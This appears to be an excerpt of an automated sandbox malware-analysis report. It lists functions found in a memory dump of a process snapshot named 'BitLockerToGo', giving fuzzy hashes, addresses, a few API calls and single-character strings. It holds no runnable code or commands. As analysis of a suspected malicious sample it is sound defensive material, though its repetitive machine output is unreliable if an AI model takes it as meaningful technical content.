Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f35d9330928bff0acfcee1ee565741da294b4015fb7ddd10068010ee5fe53df7
Instruction ID: ff426ee2e2ee27957453a7b7d6ad37bed14cfa7df17933b0a95c714c7f836e05
Opcode Fuzzy Hash: f35d9330928bff0acfcee1ee565741da294b4015fb7ddd10068010ee5fe53df7
Instruction Fuzzy Hash: BC91D335608352ABC715DF28E850A2EB3F1FF89710F59892CE981D7252E739EC60C782

Function 00729E50 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7e67a496dc92d943d997a2dbf228513a8eac3f822e0a7fe8da1cc1414a06ccc
Instruction ID: a23933060c6db2e1f7fda2bdfb10e9a29350a7de2f3ae549e4dbac80564a4bb5
Opcode Fuzzy Hash: f7e67a496dc92d943d997a2dbf228513a8eac3f822e0a7fe8da1cc1414a06ccc
Instruction Fuzzy Hash: 3D81B0342083519BD724DF28E890A2BB7F5FF89750F59891CE685CB251E739EC50CB92

Function 00717B70 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51d5747519ed0b97da08907979d2c66571ea3acfad6f62cb830e934ed31c3e63
Instruction ID: 9c99da71c8502ebdea4560a68a4d651f596b5111abd6456974deb58ba469570a
Opcode Fuzzy Hash: 51d5747519ed0b97da08907979d2c66571ea3acfad6f62cb830e934ed31c3e63
Instruction Fuzzy Hash: 8F61D52275CA804BD32C493C9C613F97AA74F96334F3C876DA6F28B3E1E95D48819391

Function 00724590 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8659926db27443426f6a1f6b7ca01ef40dc4cc43d97103cd1396a1cb31a2d910
Instruction ID: 544e1e026fa9ea3e534c642be86749639c241ed0b5915e4741c989e48dd43da0
Opcode Fuzzy Hash: 8659926db27443426f6a1f6b7ca01ef40dc4cc43d97103cd1396a1cb31a2d910
Instruction Fuzzy Hash: 4061F1346083619FEB15DF24E884B2AB7E2EF96315F18891CE5E587391D379E810CB52

Function 0071DF50 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52b175e41cfd5ab1b094b902e4e44bd05e6eb5a9d545e058933407e74115153e
Instruction ID: 529d1ed0388d39bfb2fcb4a7c05af337d8e750ca8cde9774655b63f90ddbc154
Opcode Fuzzy Hash: 52b175e41cfd5ab1b094b902e4e44bd05e6eb5a9d545e058933407e74115153e
Instruction Fuzzy Hash: 74517DB16083548FE314DF69D89435BBBE1BB88318F044E2DE4E583391E379DA488F92

Function 006EE080 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb13b93425713568883f481d479793e54fa836a23550e0ac81216d9e56e6e9d
Instruction ID: 300d082189b9341599f843402822e663d2d842353f608c786296a3464debea20
Opcode Fuzzy Hash: 5bb13b93425713568883f481d479793e54fa836a23550e0ac81216d9e56e6e9d
Instruction Fuzzy Hash: CA511833B5A7D04BD329893E5C522AA7A870FE2334B3DC36DE5B5CB3E4D16A88024345

Function 0070CB0F Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51dd0fe5d7a08a0d44c2d3df702eb7f6cd324f8470da6e7649fa9caff0ae4667
Instruction ID: 895481a0e359e5f107fd4fd43fca7a39353b3cf866becbb75769e7030ce3c159
Opcode Fuzzy Hash: 51dd0fe5d7a08a0d44c2d3df702eb7f6cd324f8470da6e7649fa9caff0ae4667
Instruction Fuzzy Hash: 81510AB2A14B194BD729CF2DD85163AB2D2ABC4200F49873CDD5B8B3C5EB74AC14D781

Function 006E8FCE Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17697c7ad3ecf9c4a8d53c70ac2c6d6df3a17945b1b568fbd75d157d0ea66c31
Instruction ID: 86ff574a28e5927110f9eebe7ac8b0a09c15cd70b9b8a822fc3b07d3125d82bd
Opcode Fuzzy Hash: 17697c7ad3ecf9c4a8d53c70ac2c6d6df3a17945b1b568fbd75d157d0ea66c31
Instruction Fuzzy Hash: 78617975618381CFD718CF29D890B9AB7E2BB88314F08892CF55987381D339EA56CF56

Function 00723460 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a75a6564dd278590a932e865fbf004fbc4fda1e320a54aa2add4b8a5a8c485d
Instruction ID: e3b4fbb05bb99b8618617287bb6c0c0866ad4c26a7ad0bb0d8f0557e0789e48f
Opcode Fuzzy Hash: 4a75a6564dd278590a932e865fbf004fbc4fda1e320a54aa2add4b8a5a8c485d
Instruction Fuzzy Hash: 9051D334609290ABD725EF15E884A2EF7E5EF95705F18881CE5C987351D33EEE10CB62

Function 006E5680 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe33b3df1d1fc659311e8dc435a2f66eabb326e688d3ad223b371a077dcb9291
Instruction ID: 9f0292f521bb4a4a881e725fe7b9f27413974e4c6f6ca887f544295c210e602b
Opcode Fuzzy Hash: fe33b3df1d1fc659311e8dc435a2f66eabb326e688d3ad223b371a077dcb9291
Instruction Fuzzy Hash: 2951CF75A067509FC714DF1AC84096BB7A2FF85328F15466CF8968B352DB30EC52CB92

Function 00729700 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc8e5125305e6be3a2d8c96b8ca8b069d04ff7a616c7135410bac0cdde804e56
Instruction ID: 5232aa6c07baddfc6738f429dc7de6b25d8ef64739fe01c33c4ab00c3ebb14e7
Opcode Fuzzy Hash: dc8e5125305e6be3a2d8c96b8ca8b069d04ff7a616c7135410bac0cdde804e56
Instruction Fuzzy Hash: 28419D74618350AFE7149F14E894B2FBBA5EF86711F2CC81CF6899B291D339E810CB56

Function 00729890 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2838abb105a74240ab0ee1d708c60dee66335e420948c51d83478d92cff2bb6
Instruction ID: dd40e023839ae83c84163d170e9a98b4ea7bf083524566ad33159ec104181996
Opcode Fuzzy Hash: a2838abb105a74240ab0ee1d708c60dee66335e420948c51d83478d92cff2bb6
Instruction Fuzzy Hash: 7C418C34608350AFD7149B14E894B2EFBA5EBC6321F28C81CE6C997281D339E850CB66

Function 006F0ED0 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8146f57c133f941cd6c6972178f3450d7ea7494f89a3344b7091582e06b8c8e1
Instruction ID: 4bd28c0a61cec10a2af1aeb9a99b44f47596920271aa7c48e0a42f4eb8ef0f9e
Opcode Fuzzy Hash: 8146f57c133f941cd6c6972178f3450d7ea7494f89a3344b7091582e06b8c8e1
Instruction Fuzzy Hash: E5411472A0C3984BD318DE3A889023ABAD2ABC5250F08C73DF5E587391EA74C946E751

Function 00723010 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09bce3f3323fad37db19d1d178928dc1698c00484b26147cd251c80e74860ccc
Instruction ID: d5658d02744bf3e643ceb79d0de0c211ff2171ce611975b915423318a8f04e29
Opcode Fuzzy Hash: 09bce3f3323fad37db19d1d178928dc1698c00484b26147cd251c80e74860ccc
Instruction Fuzzy Hash: 4A315774608344ABD300DF19E988B2FBBE2EB85714F58C91CE0C88B201D37ED915CBA6

Function 006E6B60 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 342469d9a26d51cf90a81fecc78ccdc3312358a2b1a6f5ad16dd184e5acc7ace
Instruction ID: 2bf80ce62e04ca511c8ec3df4cfcbc0aab5145cfdad3fa7870a596689d4923ab
Opcode Fuzzy Hash: 342469d9a26d51cf90a81fecc78ccdc3312358a2b1a6f5ad16dd184e5acc7ace
Instruction Fuzzy Hash: 8D112737B2576107E360CE77DCC46666343EBD536471A0534FA81D7302CA22F852D2A0

Function 0071A3F0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 5b0849ef9a16a2c8aca40e0106ff8c28ea8262da14977f11b67d066df4e69684
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 5C11A933A061E40EC3168D3C84045E5BFA30AD3675B598399F8F49B2D7D66A8DCA8356

Function 0070F530 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6226d561c1d27d01699578d317e276bd1f24f219ef86e3f1c74ed20e0dd609fe
Instruction ID: 2d117cfd829e073b9c3e009c269cd0490ece35bfca61c6d8b360cb77f6a41563
Opcode Fuzzy Hash: 6226d561c1d27d01699578d317e276bd1f24f219ef86e3f1c74ed20e0dd609fe
Instruction Fuzzy Hash: BB01D4F2601301C7DB30EE55E8C0B27B2E96F94B18F18463CE9144B682EB79ED26C6D5

Function 006FA040 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1b8d582fb4d510ac0465848603293de85f1cbeddc4253f33f89fcd910c8992e
Instruction ID: 5b39fbe5b0d48911ea06e9f384bc4ce18eab293ef31432401304d41c62122c5b
Opcode Fuzzy Hash: a1b8d582fb4d510ac0465848603293de85f1cbeddc4253f33f89fcd910c8992e
Instruction Fuzzy Hash: D0F0ECF1A0811827DB2189D4ACC0F77BB9ECBCB32CF191455E94957202D5615D40C3EB

Function 006F4C30 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c63062348bac05b3489201115881a8b8b5ef881d48c6822ad6dc8ee5318a706
Instruction ID: c36fcd3f57b7b91dc0ffbe0d4d5b4e1708c67e12ac3a4946d518184365e3f06a
Opcode Fuzzy Hash: 7c63062348bac05b3489201115881a8b8b5ef881d48c6822ad6dc8ee5318a706
Instruction Fuzzy Hash: E7F06D75909341ABD2009A64E894A2FBFFADB87380F14581CFAC893222E731C880875B

Function 00720D00 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 11989a6851ff92b2698ef26fd8f566d05369ca1d8260f00a50a40ec3e9c0b685
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: 8CD05E216092314B9B648E29A400977F7E0EA87B11F89A55EF982E3149D634EC41C2B9

Function 0071461B Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 74COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00714625
VariantInit.OLEAUT32 ref: 00714638

Strings

#, xrefs: 007146B2
/, xrefs: 00714676
-, xrefs: 0071466C
!, xrefs: 007146A8
+, xrefs: 0071468A
3, xrefs: 00714662
1, xrefs: 00714658
), xrefs: 00714680
%, xrefs: 00714694
', xrefs: 0071469E

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$%$'$)$+$-$/$1$3
API String ID: 2610073882-2331977360
Opcode ID: 47f0f865c2de4ba6b7cb6128c97c31de583927e5c155fb7c9ce8059cd68fc09f
Instruction ID: 7f5da0a8bdce1ddfce746c6c916ce1cc336d102b00a6da8cd357d934b52840df
Opcode Fuzzy Hash: 47f0f865c2de4ba6b7cb6128c97c31de583927e5c155fb7c9ce8059cd68fc09f
Instruction Fuzzy Hash: F341F47000D3C1DED362DB28908879ABFE0AB9A328F481A4DF4E9473D2C7758545CB57

Function 00715903 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 67COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0071590D
VariantInit.OLEAUT32 ref: 00715920

Strings

%, xrefs: 0071597C
/, xrefs: 0071595E
!, xrefs: 00715990
), xrefs: 00715968
+, xrefs: 00715972
1, xrefs: 00715940
3, xrefs: 0071594A
#, xrefs: 0071599A
-, xrefs: 00715954
', xrefs: 00715986

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$%$'$)$+$-$/$1$3
API String ID: 2610073882-2331977360
Opcode ID: 274e41edd682cd05e77c06e7620e898f4b9406d7eb3783d72bdacfc2bccc3847
Instruction ID: 399a0710217aae6e754f239b374c0b72811badbbab77adac2d050793e3d3264c
Opcode Fuzzy Hash: 274e41edd682cd05e77c06e7620e898f4b9406d7eb3783d72bdacfc2bccc3847
Instruction Fuzzy Hash: 4141B37000C3C1DED361DB28948869EBFE0AB9A328F445A8DF4E947392C7758545CB97

Function 007153F8 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 84COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00715402
VariantInit.OLEAUT32 ref: 00715415

Strings

G, xrefs: 00715468
M, xrefs: 00715498
I, xrefs: 00715478
K, xrefs: 00715488
O, xrefs: 007154A8
C, xrefs: 00715448
E, xrefs: 00715458
A, xrefs: 00715438

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$C$E$G$I$K$M$O
API String ID: 2610073882-1863964857
Opcode ID: a1162f761692c265317428ff84f61be5135b8ea883060cd26f584b74ab4a792b
Instruction ID: 7f8eeff85b712ea15ba9edf2a22c4a514aa399850f9c009ffe93a88db20639a8
Opcode Fuzzy Hash: a1162f761692c265317428ff84f61be5135b8ea883060cd26f584b74ab4a792b
Instruction Fuzzy Hash: 8951C27100CBC1CAD3359B2888487DBBFE0ABE2315F084A5DD5E94B392C7794545CBA7

Function 00714CD6 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 69COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00714CE0

Strings

Z, xrefs: 00714D6B
I, xrefs: 00714D03
_, xrefs: 00714D53
], xrefs: 00714D63
[, xrefs: 00714D73
W, xrefs: 00714D13
Q, xrefs: 00714D43
U, xrefs: 00714D23
S, xrefs: 00714D33

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

